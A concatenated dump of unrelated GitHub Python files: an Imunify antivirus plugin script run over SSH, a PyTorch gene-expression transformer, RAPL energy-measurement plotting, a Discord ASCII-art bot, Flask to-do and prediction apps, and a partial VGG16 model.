\"status\": OPERATION_STATUS_SUCCESS, \"result\": list()}\n\n malicious_ids = get_malicious_list(params.host, params.action)\n for file in params.file:\n file_id, iav_file_id = file\n\n result = {\"id\": file_id, \"status\": OPERATION_STATUS_FAILED, \"result\": str(), \"error\": str()}\n try:\n if int(iav_file_id) not in malicious_ids:\n result[\"error\"] = \"Can not find file in imunify malicious list\"\n except ValueError:\n result[\"error\"] = \"Only integer file ids\"\n\n cmd = [\"/usr/bin/ssh\", \"-o\", \"StrictHostKeyChecking=no\", \"root@\" + params.host]\n cmd.extend(extended_cmd)\n cmd.append(iav_file_id)\n\n proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n proc.wait()\n\n result[\"id\"] = file_id\n result[\"status\"] = OPERATION_STATUS_SUCCESS if proc.returncode == 0 else OPERATION_STATUS_FAILED\n result[\"result\"] = proc.stdout.read().decode(\"utf-8\")\n result[\"error\"] = proc.stderr.read().decode(\"utf-8\")\n operation_result[\"result\"].append(result)\n\n return operation_result\n\n\ndef process(params):\n \"\"\"\n Обработка запроса\n :param params: Праметры запрашиваемой операции\n :return:\n \"\"\"\n if params.action == FILE_ACTION_DELETE:\n extended_cmd = [\"imunify-antivirus\", \"malware\", \"malicious\", \"delete\"]\n return handle_operation(params, extended_cmd)\n if params.action == FILE_ACTION_CURE:\n extended_cmd = [\"/bin/python3\", \"/opt/ispsystem/plugin/imunify/heal.py\", \"--iav-file-id\"]\n return handle_operation(params, extended_cmd)\n if params.action == FILE_ACTION_RESTORE:\n extended_cmd = [\"imunify-antivirus\", \"malware\", \"malicious\", \"restore-original\"]\n return handle_operation(params, extended_cmd)\n\n return {\"action\": params.action, \"status\": OPERATION_STATUS_FAILED, \"error\": \"There is no handler for this action\"}\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument(\"--host\", help=\"Host\", required=True)\n parser.add_argument(\"--action\", help=\"Action\", required=True)\n parser.add_argument(\"--file\", action='append', nargs=2, help=\"File\", metavar=(\"FILE_ID\", \"IAV_FILE_ID\"), required=True)\n args = parser.parse_args()\n\n if args.host and args.action:\n result = process(args)\n print(json.dumps(result))\n","repo_name":"ispsystem/plugin-imunify","sub_path":"server/scripts/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"5830041010","text":"import os\nimport random\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport multiprocessing\n\nfrom tqdm import tqdm\n\nfrom transformers import BertTokenizer\n\nfrom sklearn.metrics import precision_recall_fscore_support\n\nfrom models.base import *\nfrom models.base import _USE_HALFLIFE, _USE_SEQ, _USE_TF\nfrom models.utils import (\n get_data_loader,\n)\nfrom models.DataEmbedding import DataEmbedding\nfrom models.BertDeepLncLocEmbedding import BertDeepLncLocEmbedding\n\nfrom tools import cpp_utils\n\n\nBERT_PATH = \"trained_models/bert/promoter_k3_to_k7/checkpoint-100000\"\n\n\nclass SeqHalflifeToTFDataset(Dataset):\n def __init__(self, filename, truncation: tuple = None, promoter_embedding=True, **kwargs) -> None:\n super().__init__()\n # bert_path = \"trained_models/bert/promoter_k5/checkpoint-70000\"\n self.tokenizer = BertTokenizer.from_pretrained(BERT_PATH)\n file = h5py.File(filename, \"r\", swmr=True)\n self.X_promoter = file[\"promoter\"]\n self.X_halflife, self.tf, self.y = (\n torch.tensor(np.array(file[\"halflife\"]), dtype=torch.float32),\n torch.tensor(np.array(file[\"tf\"]), dtype=torch.float32),\n torch.tensor(np.array(file[\"label\"]), dtype=torch.float32),\n )\n if truncation:\n self.X_promoter = self.X_promoter[:, truncation[0] : truncation[1]]\n if self.X_promoter.dtype == np.bool8:\n self.X_promoter = self.X_promoter.astype(np.float32)\n self.embedded_promoter = multiprocessing.Manager().dict() if promoter_embedding else None\n\n def __len__(self):\n return len(self.y)\n\n def embedding(self, onehot_sent):\n onehot_sent = np.insert(onehot_sent, 4, 1, axis=1) # 0:A, 1:C, 2:G, 3:T, 4:none\n max_indices = np.argmax(onehot_sent, axis=1)\n char_dict = {4: \"N\", 0: \"A\", 1: \"C\", 2: \"G\", 3: \"T\"}\n translated_sent = \"\".join([char_dict[i.item()] for i in max_indices])\n small_sent_ls = cpp_utils.sliding_window(translated_sent, 100, 50)\n fragmented_sent_ls = []\n for small_sent in small_sent_ls:\n sent = \" \".join(cpp_utils.fragment(4, 4, small_sent))\n fragmented_sent_ls.append(sent)\n input_ids = torch.tensor(\n np.array(\n self.tokenizer(\n fragmented_sent_ls,\n add_special_tokens=False,\n )[\"input_ids\"],\n dtype=np.int32,\n )\n )\n return input_ids\n\n def __getitem__(self, idx):\n promoter = self.X_promoter[idx]\n if self.embedded_promoter is not None:\n if idx in self.embedded_promoter:\n promoter = self.embedded_promoter[idx]\n else:\n promoter = self.embedding(promoter)\n self.embedded_promoter[idx] = promoter\n return promoter, self.X_halflife[idx], self.tf[idx], self.y[idx]\n\n\nclass TransformerSeqHalflifeToTF(ModelBase):\n tags = [\"TransformerSeqHalflifeToTF\"]\n\n def __init__(self, n_heads=4, dropout_rate=0.1) -> None:\n super().__init__()\n self.model_type = \"TransformerSeqHalflifeToTF\"\n self.seq_deeplncloc_embedding = BertDeepLncLocEmbedding(BERT_PATH)\n hidden_size = 256\n self.hidden_size = hidden_size\n self.half_embedding = DataEmbedding(\n hidden_size, length=8, norm_type=\"bn\", pos_embedding=\"abs\", dropout=dropout_rate, cls_token=False\n )\n self.mixture_encoder = nn.TransformerEncoder(\n nn.TransformerEncoderLayer(\n d_model=hidden_size,\n nhead=n_heads,\n dim_feedforward=hidden_size * 4,\n batch_first=True,\n ),\n num_layers=2,\n )\n self.final_fc = nn.Sequential(\n nn.Linear(256 + 8, 256),\n nn.ReLU(),\n nn.Dropout(dropout_rate),\n nn.Linear(256, 181),\n nn.Sigmoid(),\n )\n\n def forward(self, input_seq, input_halflife, input_tf, predict=True):\n \"\"\"\n :param input_seq: [bs, seq_len, channels]\n :param input_halflife: [bs, 8]\n :param input_tf: [bs, 181]\n \"\"\"\n seq = input_seq\n halflife = input_halflife\n tf = input_tf\n all_data = None\n seq = self.seq_deeplncloc_embedding(seq)\n\n halflife = self.half_embedding(halflife)\n all_data = torch.cat([seq, halflife], dim=1)\n all_data = self.mixture_encoder(all_data) # [bs, seq_len/210, channels]\n\n feature = torch.mean(all_data, dim=1)\n feature = torch.cat([feature, input_halflife], dim=1)\n if predict:\n return self.final_fc(feature)\n else:\n return feature\n\n\nclass TransformerSeqHalflifeToTFTrainer(BaseTrainer):\n def __init__(self) -> None:\n super().__init__(\n patience=5,\n )\n\n @staticmethod\n def get_data_loader():\n center = 10000\n upstream = center - 7000\n downstream = center + 3500\n datadir = \"Dataset/dataset_aumentati\"\n filename_format = \"{}_tf.h5\"\n trainloader, validloader, testloader = get_data_loader(\n filenames=[os.path.join(datadir, filename_format.format(i)) for i in (\"train\", \"validation\", \"test\")],\n batch_size=4 if os.environ.get(\"_USE_SEQ\") == \"1\" else 128,\n dateset_cls=SeqHalflifeToTFDataset,\n truncation=(upstream, downstream),\n num_workers=12,\n promoter_embedding=True if os.environ.get(\"_USE_SEQ\") == \"1\" else False,\n )\n return trainloader, validloader, testloader\n\n def generate_model_optimizer_criterion(self):\n model = TransformerSeqHalflifeToTF().to(torch.device(\"cuda\"))\n optimizer = optim.AdamW(model.parameters(), lr=1e-5)\n criterion = nn.BCELoss()\n return model, optimizer, criterion\n\n def start_one_run(self, run, model, optimizer, criterion, trainloader, validloader, testloader):\n last_boost = 0\n best_model_f1 = -100\n for epoch in range(self.epochs):\n train_loss = self.train(epoch, model, optimizer, criterion, trainloader)\n eval_loss, eval_f1 = self.evaluate(epoch, model, criterion, validloader, log_prefix=\"val\")\n if eval_f1 > best_model_f1:\n print(\"Saving model\")\n model_name = model.__class__.__name__\n project_name = f\"SEQ{_USE_SEQ}-HALF{_USE_HALFLIFE}-TF{_USE_TF}\"\n model_path = os.path.join(\"trained_models\", model_name, project_name)\n if not os.path.exists(model_path):\n os.makedirs(model_path)\n while len(glob.glob(f\"{model_path}/*.pt\")) > 2:\n os.remove(sorted(glob.glob(f\"{model_path}/*.pt\"))[0])\n torch.save(\n model.state_dict(), os.path.join(model_path, f\"{model_name}-{eval_f1:.3f}-{eval_loss:.3f}.pt\")\n )\n self.best_model_state = copy.deepcopy(model.state_dict())\n best_model_f1 = eval_f1\n last_boost = 0\n else:\n last_boost += 1\n if last_boost > self.patience:\n print(\"Early stopping. Best model f1: {:.3f}\".format(best_model_f1))\n break\n model.load_state_dict(self.best_model_state)\n test_loss, test_f1 = self.evaluate(epoch, model, criterion, testloader, log_prefix=\"test\")\n print(\"Best model test f1: {:.3f} loss:{:.3f}\".format(test_f1, test_loss))\n self.writer.finish()\n return test_f1, test_loss\n\n @torch.no_grad()\n def evaluate(self, epoch, model, criterion, dataloader, log_prefix=\"val\"):\n model.eval()\n test_loss_ls = []\n y_pred_ls = []\n tf_true_ls = []\n for i, (X_promoter, X_halflife, X_tf, y) in enumerate(tqdm(dataloader, desc=\"Testing\", ncols=100)):\n X_promoter, X_halflife, X_tf = (\n X_promoter.to(self.device),\n X_halflife.to(self.device),\n X_tf.to(self.device),\n )\n y_pred = model(\n X_promoter,\n X_halflife,\n X_tf,\n )\n y_pred = y_pred.squeeze().cpu()\n y_pred_ls.append(y_pred)\n tf_true_ls.append(X_tf.cpu())\n loss = criterion(y_pred, X_tf.cpu())\n test_loss_ls.append(loss.item())\n\n loss = np.mean(test_loss_ls)\n y_pred_ls, tf_true_ls = torch.cat(y_pred_ls), torch.cat(tf_true_ls)\n precision, recall, f1, _ = precision_recall_fscore_support(tf_true_ls, y_pred_ls > 0.5, average=\"micro\")\n print(\n f\"\\033[31m{log_prefix} set: loss:{loss:.4f} precision: {precision:.4f} recall:{recall:.4f} f1:{f1:.4f} \\033[0m\"\n )\n\n return loss, f1\n\n def train(self, epoch, model, optimizer, criterion, trainloader):\n model.train()\n train_loss_ls = []\n for i, (X_promoter, X_halflife, X_tf, y) in enumerate(\n tqdm(trainloader, desc=\"Training {}\".format(epoch), ncols=100)\n ):\n X_promoter, X_halflife, X_tf = (\n X_promoter.to(self.device),\n X_halflife.to(self.device),\n X_tf.to(self.device),\n )\n optimizer.zero_grad()\n y_pred = model(X_promoter, X_halflife, X_tf)\n y_pred = y_pred.squeeze().cpu()\n y = y.squeeze().cpu()\n loss = criterion(y_pred, X_tf.cpu())\n train_loss_ls.append(loss.item())\n loss.backward()\n nn.utils.clip_grad_norm_(model.parameters(), 5)\n optimizer.step()\n print(f\"\\033[34mTrain Epoch: {epoch} \\tLoss: {np.mean(train_loss_ls):.6f} \\033[0m\")\n self.writer.log({\"train/loss\": np.mean(train_loss_ls)})\n return np.mean(train_loss_ls)\n","repo_name":"doveppp/MultimodalExpression","sub_path":"models/TransformerSeqHalflifeToTF.py","file_name":"TransformerSeqHalflifeToTF.py","file_ext":"py","file_size_in_byte":9850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5481026964","text":"import argparse\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport sys\n\nLOOPS_STATS_FILE = \"loop_stats.txt\"\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-i', nargs='+')\nparser.add_argument('-o', nargs='+')\nparser.add_argument('-r', nargs='+')\nparser.add_argument('-c', nargs=1)\n\nargs = parser.parse_args()\n\nwith open(LOOPS_STATS_FILE) as f:\n runs = int((f.readline().split(\":\"))[1])\n loop_iterations = int((f.readline().split(\":\"))[1])\n empty_loop_iterations = int((f.readline().split(\":\"))[1])\n loop_energy = float((f.readline().split(\":\"))[1])\n loop_time = float((f.readline().split(\":\"))[1])\n\nloop_time_per_iteration = loop_time / empty_loop_iterations\nenergy_per_iteration = loop_energy / empty_loop_iterations\n\nenergy_per_iteration_micro = energy_per_iteration * 1000000\n\ndef plot_rapl_refresh_rates():\n if not args.r:\n return\n\n for input in args.r:\n data = np.loadtxt(input, delimiter=',', skiprows=1)\n\n data = data * 1000000 # to microseconds\n\n hist, bins = np.histogram(data, bins=50)\n plt.plot(bins[1:], hist, label=(input.split(\".\")[0]))\n\n plt.ylabel(\"Počet prípadov\")\n plt.xlabel(\"Čas [\\u03bcs]\")\n plt.legend()\n plt.grid()\n plt.show()\n\ndef plot_instruction_energy():\n if not args.i:\n return\n\n for input in args.i:\n data = np.loadtxt(input, delimiter=',', skiprows=1)\n\n data = np.split(data, runs)\n data = np.median(data, axis=1)\n\n data = data / loop_iterations\n data = data - energy_per_iteration_micro\n\n # For consistent zoom-in on the plot\n #data = data[(data <= 0.5)]\n\n #sns.kdeplot(data, label=(input.split(\".\")[0]))\n\n hist, bins = np.histogram(data, bins='auto')\n plt.plot(bins[1:], hist, label=(input.split(\".\")[0]))\n\n plt.ylabel(\"Počet prípadov\")\n plt.xlabel(\"Energia v \\u03bcJ\")\n plt.legend()\n plt.grid()\n plt.show()\n\ndef plot_operand_energy():\n if not args.o:\n return\n\n for input in args.o:\n data = np.loadtxt(input, delimiter=',', skiprows=1)\n\n data = np.split(data, runs)\n data = np.median(data, axis=1)\n\n data = data / loop_iterations\n data = data - energy_per_iteration_micro\n\n # For consistent zoom-in on the plot\n data = data[(data <= 0.5)]\n\n sns.kdeplot(data, label=(input.split(\".\")[0]))\n\n plt.ylabel(\"Odhad hustoty rozloženia (KDE)\")\n plt.xlabel(\"Energia v \\u03bcJ\")\n plt.legend()\n plt.grid()\n plt.show()\n\ndef plot_covert_channel():\n if not args.c:\n return\n\n f = args.c[0]\n\n data = np.loadtxt(f)\n\n plt.plot(data)\n plt.ylabel(\"Energia v \\u03bcJ\")\n\n #window = 10\n #avg = np.convolve(data, np.ones(window), 'valid') / window\n #plt.plot(avg, label=\"rolling average\")\n plt.grid()\n plt.show()\n\nplot_rapl_refresh_rates()\nplot_instruction_energy()\nplot_operand_energy()\nplot_covert_channel()\n","repo_name":"pemeth/bza-platypus","sub_path":"plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72038094248","text":"import os\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport json\nimport argparse\nfrom mli_eval.plotting.scatter import mscatter\n\nfrom sklearn.linear_model import LinearRegression\n\n\ncolors = sns.color_palette()\nplt.style.use(\"seaborn\")\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"summary_path\")\nparser.add_argument(\"--thresh\", type=float, default=0.1)\nparser.add_argument(\"--show\", action=\"store_true\")\nargs = parser.parse_args()\n\n\ndef plot_gl_vs_wdist(\n data, threshold=0.1, figname=\"gl_vs_wdist.png\",\n figtitle=\"Distance in weight space against Gauss length\",\n normalized=False, conf_filter=None):\n gauss_lengths = []\n wdists = []\n loss = []\n markers = []\n \n for run in data:\n marker = \"o\"\n if conf_filter is not None and not conf_filter(run[\"config\"]):\n continue\n min_loss = run[\"min_train_loss\"]\n if min_loss < threshold:\n markers.append(marker)\n loss.append(min_loss)\n gauss_lengths.append(run[\"gauss_length\"])\n wdists.append(run[\"normed_weight_dist\"] if normalized else run[\"weight_dist\"])\n \n fig, ax = plt.subplots(figsize=(6,3))\n xlabel = r\"$\\log \\Vert \\theta_T - \\theta_0 \\Vert_2$\"\n if normalized:\n xlabel += r\" - $\\log \\Vert \\theta_0 \\Vert_2$\"\n ax.set_xlabel(xlabel, fontsize=14)\n ax.set_ylabel(r\"$\\log$(Gauss length)\", fontsize=14)\n ax.set_title(figtitle, fontsize=16)\n \n log_wd = np.log(wdists)\n log_gl = np.log(gauss_lengths)\n mscatter(log_wd, log_gl, ax=ax, alpha=1, color = \"b\", m=markers)\n plt.tight_layout()\n \n path = os.path.join(os.path.dirname(args.summary_path), figname)\n plt.savefig(path)\n if args.show:\n plt.show()\n \n reg = LinearRegression().fit(log_wd.reshape(-1, 1), log_gl.reshape(-1, 1))\n r2 = reg.score(log_wd.reshape(-1, 1), log_gl.reshape(-1, 1))\n print(\"Goodness of fit: {}\".format(r2))\n print(\"Slope: {}\".format(reg.coef_))\n\ndef main(summary_path, threshold=0.1):\n with open(summary_path) as f:\n data = json.load(f)\n plot_gl_vs_wdist(\n data, figname=\"gl_vs_wdist.pdf\",\n figtitle=r\"Autoencoder Gauss length vs weight distance\",\n threshold=threshold,\n normalized=True\n )\n\n plot_gl_vs_wdist(\n data, figname=\"gl_vs_wdist_unnorm.pdf\",\n figtitle=r\"Autoencoder Gauss length vs weight distance\",\n threshold=threshold,\n normalized=False\n )\n\n\nif __name__ == \"__main__\":\n main(args.summary_path, args.thresh)","repo_name":"AtheMathmo/mli-release","sub_path":"scripts/train_ae_fc/visualizations/plot_gl_vs_wdist.py","file_name":"plot_gl_vs_wdist.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"36809200007","text":"import os\nimport discord\nfrom discord.ext import commands\nimport pil\n\nintents = discord.Intents.default()\nintents.message_content = True\nintents.members = True\nbot = commands.Bot(command_prefix='!', intents = intents)\n@bot.command(name='test', help='input url and name the image, converts inputted image to ascii art')\nasync def test(ctx, url):\n print(url)\n pil.url = url\n print(pil.url)\n print(pil.ascii_converter(pil.url))\n file1 = open('ascii_image.txt', 'r')\n lines = file1.readlines()\n print(lines)\n await ctx.send(\"I made this for you: \\n\")\n await ctx.send(\"\\n {0}\".format(lines))\n\n\n@bot.command()\nasync def echo(ctx, arg):\n await ctx.send(arg)\n \nbot.run(os.getenv('TOKEN'))\n","repo_name":"JustenYergo/Image-to-ASCII-Converting-Discord-Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27361774855","text":"from flask import render_template, redirect, request, session\nfrom logic.tasksLogic import TaskLogic\nimport random\nimport requests\n\n\nclass FilterRoutes:\n @staticmethod\n def configure_routes(app):\n @app.route(\"/filterTasks\", methods=[\"GET\", \"POST\"])\n def filterTasks():\n if request.method == \"GET\":\n return redirect(\"todolist\")\n elif request.method == \"POST\":\n logic = TaskLogic()\n\n # Recuperando informacion sobre el usuario\n userid = session.get(\"login_user_id\")\n username = session.get(\"login_user_name\")\n\n # Pidiendo la fecha a aplicar los filtros\n date = session.get(\"current_date\")\n print(date)\n\n categorias = logic.traerCategorias()\n\n # Recuperando Informacion del form\n sol_prioridad = request.form[\"filtroPrioridad\"]\n sol_categoria = request.form[\"filtroCategoria\"]\n sol_estado = request.form[\"filtroEstado\"]\n\n print(sol_prioridad, sol_categoria, sol_estado)\n\n dataJson = []\n # Recovering tip from API\n messageAPIFailure_tip = \"\"\n tipsIDs = []\n randomtip = {}\n restapi = \"https://apicarbono.herokuapp.com\"\n endpoint = \"/contenido\"\n categoriasapi = [\"/Libro\", \"/Consejos\", \"/Charla\"]\n categoriaapi = random.choice(categoriasapi)\n\n url = f\"{restapi}{endpoint}{categoriaapi}\"\n\n response = requests.get(url)\n print(response)\n if response.status_code == 200:\n dataJson = response.json()\n\n for tip in dataJson:\n tipsIDs.append(tip[\"id\"])\n\n randomtipid = random.choice(tipsIDs)\n\n for tip in dataJson:\n if int(tip[\"id\"]) == randomtipid:\n randomtip = tip\n\n print(\"Escogido\", randomtip, sep=\"||\")\n\n else:\n messageAPIFailure_tip = \"No hay recomendación por el momento. Recarga la página si deseas volver a probar.\"\n\n # Recovering trainer from API\n trainerIDs = []\n randomtrainer = {}\n messageAPIFailure_trainer = \"\"\n restapi = \"https://apicarbono.herokuapp.com\"\n endpoint = \"/trainers\"\n categoriasapi = [\"/Efectividad\", \"/Liderazgo\",\n \"/Organizacion\", \"/Productividad\"]\n categoriaapi = random.choice(categoriasapi)\n\n url = f\"{restapi}{endpoint}{categoriaapi}\"\n\n response = requests.get(url)\n print(response)\n if response.status_code == 200:\n dataJson = response.json()\n\n for trainer in dataJson:\n trainerIDs.append(trainer[\"id\"])\n\n randomtrainerid = random.choice(trainerIDs)\n \n\n for trainer in dataJson:\n if int(trainer[\"id\"]) == randomtrainerid:\n randomtrainer = trainer\n\n print(\"Escogido\", randomtrainer, sep=\"||\")\n else:\n messageAPIFailure_trainer = \"No hay trainer por el momento. Recarga la página si deseas volver a probar.\"\n\n\n # Comprobando si es Cliente o Administrador\n if int(session.get(\"login_user_CA\")) == 0:\n tasksAll = logic.getAllTasksByUser(userid)\n tasks, filteredTasks, filteredTasksIDs = [[], [], []]\n fprior, fcat, fest = [[], [], []]\n\n # Verificando fecha de las tareas\n for task in tasksAll:\n if date == str(task[\"date\"]):\n tasks.append(task)\n else:\n continue\n\n # Filtro por prioridad\n if sol_prioridad != \"-\":\n for task in tasks:\n if sol_prioridad == str(task[\"priority\"]):\n fprior.append(task[\"taskid\"])\n else:\n continue\n else:\n for task in tasks:\n fprior.append(task[\"taskid\"])\n\n # Filtro por categoria\n if sol_categoria != \"-\":\n for task in tasks:\n if sol_categoria == str(task[\"categoria\"]):\n fcat.append(task[\"taskid\"])\n else:\n continue\n else:\n for task in tasks:\n fcat.append(task[\"taskid\"])\n\n # Filtro por estado\n if sol_estado != \"-\":\n for task in tasks:\n if sol_estado == str(task[\"estado\"]):\n fest.append(task[\"taskid\"])\n else:\n continue\n else:\n for task in tasks:\n fest.append(task[\"taskid\"])\n\n # Filtrando entre listas filtradas de IDs\n for currentID in fprior:\n if currentID in fcat and currentID in fest:\n filteredTasksIDs.append(currentID)\n print(filteredTasksIDs)\n\n # Encontrando tareas\n for task in tasks:\n if task[\"taskid\"] in filteredTasksIDs:\n filteredTasks.append(task)\n\n if session.get(\"date_tasksIDs\"):\n session.pop(\"date_tasksIDs\")\n print(\"Found a previos list and removed it!\")\n\n session[\"date_tasksIDs\"] = filteredTasksIDs\n\n print(filteredTasks)\n\n return render_template(\"todolist.html\", userid=userid, username=username,\n tasks=filteredTasks, date=date, categorias=categorias,\n recomendacion=randomtip, trainer=randomtrainer,\n failTip = messageAPIFailure_tip, failTrainer = messageAPIFailure_trainer)\n\n elif int(session.get(\"login_user_CA\")) == 1:\n tasksCAll = logic.getAllTasksClients()\n tasksAAll = logic.getAllTasksByUser(userid)\n tasksC, tasksA = [[], []]\n filteredTasksC, filteredTasksA, filteredTasksIDs = [\n [], [], []]\n fpriorC, fcatC, festC = [[], [], []]\n fpriorA, fcatA, festA = [[], [], []]\n\n # Verificando fecha de las tareas\n for task in tasksCAll:\n if date == str(task[\"date\"]):\n tasksC.append(task)\n else:\n continue\n\n for task in tasksAAll:\n if date == str(task[\"date\"]):\n tasksA.append(task)\n else:\n continue\n\n # Filtro por prioridad\n if sol_prioridad != \"-\":\n for task in tasksC:\n if sol_prioridad == str(task[\"priority\"]):\n fpriorC.append(task[\"taskid\"])\n else:\n continue\n\n for task in tasksA:\n if sol_prioridad == str(task[\"priority\"]):\n fpriorA.append(task[\"taskid\"])\n else:\n continue\n else:\n for task in tasksC:\n fpriorC.append(task[\"taskid\"])\n\n for task in tasksA:\n fpriorA.append(task[\"taskid\"])\n\n # Filtro por categoria\n if sol_categoria != \"-\":\n for task in tasksC:\n if sol_categoria == str(task[\"categoria\"]):\n fcatC.append(task[\"taskid\"])\n else:\n continue\n\n for task in tasksA:\n if sol_categoria == str(task[\"categoria\"]):\n fcatA.append(task[\"taskid\"])\n else:\n continue\n else:\n for task in tasksC:\n fcatC.append(task[\"taskid\"])\n\n for task in tasksA:\n fcatA.append(task[\"taskid\"])\n\n # Filtro por estado\n if sol_estado != \"-\":\n for task in tasksC:\n if sol_estado == str(task[\"estado\"]):\n festC.append(task[\"taskid\"])\n else:\n continue\n\n for task in tasksA:\n if sol_estado == str(task[\"estado\"]):\n festA.append(task[\"taskid\"])\n else:\n continue\n else:\n for task in tasksC:\n festC.append(task[\"taskid\"])\n\n for task in tasksA:\n festA.append(task[\"taskid\"])\n\n # Filtrando entre listas filtradas de IDs\n for currentID in fpriorC:\n if currentID in fcatC and currentID in festC:\n filteredTasksIDs.append(currentID)\n\n for currentID in fpriorA:\n if currentID in fcatA and currentID in festA:\n filteredTasksIDs.append(currentID)\n\n # Encontrando tareas\n for task in tasksC:\n if task[\"taskid\"] in filteredTasksIDs:\n filteredTasksC.append(task)\n\n for task in tasksA:\n if task[\"taskid\"] in filteredTasksIDs:\n filteredTasksA.append(task)\n\n if session.get(\"date_tasksIDs\"):\n session.pop(\"date_tasksIDs\")\n print(\"Found a previos list and removed it!\")\n\n session[\"date_tasksIDs\"] = filteredTasksIDs\n\n print(filteredTasksC, filteredTasksA, sep=\"|**|\")\n return render_template(\"dashboardToDo.html\", userid=userid, username=username,\n tasksC=filteredTasksC, tasksA=filteredTasksA, date=date,\n categorias=categorias, recomendacion=randomtip, trainer=randomtrainer,\n failTip = messageAPIFailure_tip, failTrainer = messageAPIFailure_trainer)\n","repo_name":"DAP-web/Carbono","sub_path":"routes/filter_routes.py","file_name":"filter_routes.py","file_ext":"py","file_size_in_byte":11557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40573997621","text":"from flask import Flask, request, render_template\nimport pickle\nimport pandas as pandas\nimport numpy as np\n\napp = Flask(__name__)\n\nmodel_file = open('model.pkl', 'rb')\nmodel = pickle.load(model_file, encoding='bytes')\n\n@app.route('/')\ndef index():\n return render_template('index.html', JURUSAN=0)\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n '''\n Predict the insurance cost based on user inputs\n and render the result to the html page\n '''\n JENIS_KELAMIN, KABUPATEN_KOTA, PROVINSI, JENJANG, TAHUN_LULUS= [x for x in request.form.values()]\n\n data = []\n JENIS_KELAMIN=str(request.form['JENIS_KELAMIN'])\n KABUPATEN_KOTA=str(request.form['KABUPATEN_KOTA'])\n PROVINSI=str(request.form['KABUPATEN_KOTA'])\n JENJANG=str(request.form['JENJANG'])\n data.append(int(TAHUN_LULUS))\n\n\n\n\n prediction = model.predict([data])\n output = prediction \n \n return render_template('index.html', JURUSAN=output, JENIS_KELAMIN=JENIS_KELAMIN, KABUPATEN_KOTA=KABUPATEN_KOTA, \n PROVINSI=PROVINSI, JENJANG=JENJANG, TAHUN_LULUS=TAHUN_LULUS )\n\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"wiwinhandoko/predict-pmb","sub_path":"web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39858196645","text":"from training_helper import *\n\n\nimport torch.nn.utils.prune as prune\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets, transforms\nimport torch.nn.init as init\nfrom torchsummary import summary\nimport torch.optim as optim\n\nclass VGG16(nn.Module):\n \"\"\"\n A standard VGG16 model\n \"\"\"\n\n def __init__(self, n_classes,sparse_conv_flag=True):\n self._sparse_conv_flag=sparse_conv_flag\n super(VGG16, self).__init__()\n\n self.layer1 = nn.Sequential(\n nn.Conv2d(1, 64, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(64),\n nn.ReLU())\n self.layer2 = nn.Sequential(\n nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(64),\n nn.ReLU(), \n nn.MaxPool2d(kernel_size = 2, stride = 2))\n self.layer3 = nn.Sequential(\n nn.Conv2d(64, 128, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(128),\n nn.ReLU())\n self.layer4 = nn.Sequential(\n nn.Conv2d(128, 128, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(128),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size = 2, stride = 2))\n self.layer5 = nn.Sequential(\n nn.Conv2d(128, 256, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(256),\n nn.ReLU())\n self.layer6 = nn.Sequential(\n nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(256),\n nn.ReLU())\n self.layer7 = nn.Sequential(\n nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(256),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size = 2, stride = 2))\n self.layer8 = nn.Sequential(\n nn.Conv2d(256, 512, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(512),\n nn.ReLU())\n self.layer9 = nn.Sequential(\n nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(512),\n nn.ReLU())\n self.layer10 = nn.Sequential(\n nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size = 2, stride = 2))\n self.layer11 = nn.Sequential(\n nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(512),\n nn.ReLU())\n self.layer12 = nn.Sequential(\n nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(512),\n nn.ReLU())\n self.layer13 = nn.Sequential(\n nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size = 2, stride = 2))\n self.fc = nn.Sequential(\n nn.Dropout(0.5),\n nn.Linear(512, 4096),\n nn.ReLU())\n self.fc1 = nn.Sequential(\n nn.Dropout(0.5),\n nn.Linear(4096, 4096),\n nn.ReLU())\n self.fc2= nn.Sequential(\n nn.Linear(4096, n_classes))\n \n def 